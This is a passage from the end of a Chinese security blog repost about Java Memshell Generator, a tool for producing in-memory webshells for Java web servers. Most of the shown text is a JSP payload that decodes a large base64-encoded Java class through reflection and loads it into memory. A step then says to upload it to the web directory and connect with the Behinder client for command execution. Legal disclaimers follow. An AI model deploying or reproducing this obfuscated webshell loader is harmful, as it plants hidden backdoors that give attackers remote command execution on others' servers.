A8rGQQDFQW2AUCn/+srtgFEsAAAAAMAGQAAAB4ABwAAAJoACACbABEAnAAaAJ0AIQCfAC0AoAA5AKIAGgAAAD4ABgAAAD4BIwCkAAAACAA2ASQBJQABABEALQEmAScAAgAaACQBKAEpAAMAIQAdASoApAAEACoAFAErAQIABQAoAAAAHAAC/wAhAAUHAMgHAS0HAS8HATEHAMgAAPwAFwEACwAAAAQAAQANAAgAZwBZAAIABwAAAFcAAgADAAAAESoruAFMTSwEtgFPLCq2AVCwAAAAAgAZAAAADgADAAAApgAGAKcACwCoABoAAAAgAAMAAAARAUUAHAAAAAAAEQFGAQQAAQAGAAsBRwFIAAIACwAAAAQAAQAYAAgBSQFKAAIABwAAAMcAAwAEAAAAKCq2AHpNLMYAGSwrtgFXTi0EtgFPLbBOLLYBWk2n/+m7AVJZK7cBW78AAQAJABUAFgFSAAQAGQAAACYACQAAAKwABQCtAAkArwAPALAAFACxABYAsgAXALMAHAC0AB8AtgAaAAAANAAFAA8ABwFHAUgAAwAXAAUASgFTAAMAAAAoAUUAHAAAAAAAKAFGAQQAAQAFACMApwCoAAIAIgAAAAwAAQAFACMApwEQAAIAKAAAAA0AA/wABQcAfFAHAVIIAAsAAAAEAAEBUgAoAFgAWQACAAcAAABCAAQAAgAAAA4qKwO9AHwDvQAEuADtsAAAAAIAGQAAAAYAAQAAALoAGgAAABYAAgAAAA4BXAAcAAAAAAAOAV0BBAABAAsAAAAIAAMAnACaAJ4AKQBYAOsAAgAHAAACFwADAAkAAADKKsEAfJkACirAAHynAAcqtgB6OgQBOgUZBDoGGQXHAGQZBsYAXyzHAEMZBrYBazoHAzYIFQgZB76iAC4ZBxUIMrYBbCu2AW+ZABkZBxUIMrYBc76aAA0ZBxUIMjoFpwAJhAgBp//QpwAMGQYrLLYA0ToFp/+pOgcZBrYBWjoGp/+dGQXHAAy7AJxZK7cBdL8ZBQS2ANcqwQB8mQAaGQUBLbYA37A6B7sAlVkZB7YBd7cBeL8ZBSottgDfsDoHuwCVWRkHtgF3twF4vwADACUAcgB1AJwAnACjAKQAmgCzALoAuwCaAAMAGQAAAG4AGwAAAL4AFAC/ABcAwQAbAMIAJQDEACkAxgAwAMcAOwDIAFYAyQBdAMoAYADHAGYAzQBpAM4AcgDSAHUA0AB3ANEAfgDSAIEA1ACGANUAjwDXAJUA2ACcANoApADbAKYA3ACzAOAAuwDhAL0A4gAaAAAAegAMADMAMwEBAQIACAAwADYBXgFfAAcAdwAHAEoBYAAHAKYADQBKAWEABwC9AA0ASgFhAAcAAADKAUUAHAAAAAAAygFdAQQAAQAAAMoBYgFjAAIAAADKAWQA4QADABQAtgCnAKgABAAXALMBZQCmAAUAGwCvAWYAqAAGACgAAAAvAA4OQwcAfP4ACAcAfAcA0wcAfP0AFwcBZwEs+QAFAghCBwCcCw1UBwCaDkcHAJoACwAAAAgAAwCcAJ4AmgAIAXkAFgABAAcAAAAlAAIAAAAAAAm7AAJZtwF6V7EAAAABABkAAAAKAAIAAAAhAAgAIgAA";&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;byte[] bytecode =&nbsp;null;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Class&nbsp;base64Clz&nbsp;=&nbsp;classLoader.loadClass("java.util.Base64");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Class&nbsp;decoderClz&nbsp;=&nbsp;classLoader.loadClass("java.util.Base64$Decoder");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Object&nbsp;decoder&nbsp;=&nbsp;base64Clz.getMethod("getDecoder").invoke(base64Clz);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bytecode = (byte[]) decoderClz.getMethod("decode", String.class).invoke(decoder, bytecodeBase64);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;catch&nbsp;(ClassNotFoundException ee) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Class&nbsp;datatypeConverterClz&nbsp;=&nbsp;classLoader.loadClass("javax.xml.bind.DatatypeConverter");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(datatypeConverterClz, bytecodeBase64);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Class&nbsp;clazz&nbsp;=&nbsp;(Class)defineClass.invoke(classLoader,bytecode,0,bytecode.length);&nbsp; &nbsp; &nbsp; &nbsp; clazz.newInstance();&nbsp; &nbsp; }%>

3、将内存马上传至web目录,即可通过冰蝎工具连接,进一步获取命令执行权限

0x03 总结

Java Memshell Generator作为一款专注于Java主流Web中间件的内存马快速生成工具,通过对多种中间件和框架的支持,丰富的内存马类型选择,以及多样化的输出格式和辅助模块,能够在不同的安全场景中发挥重要作用。

【声明】本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统以及盈利等目的,一切后果由操作者自行承担!!!

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全有术 刘顺《Java内存马生成神器 | Java Memshell Generator》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0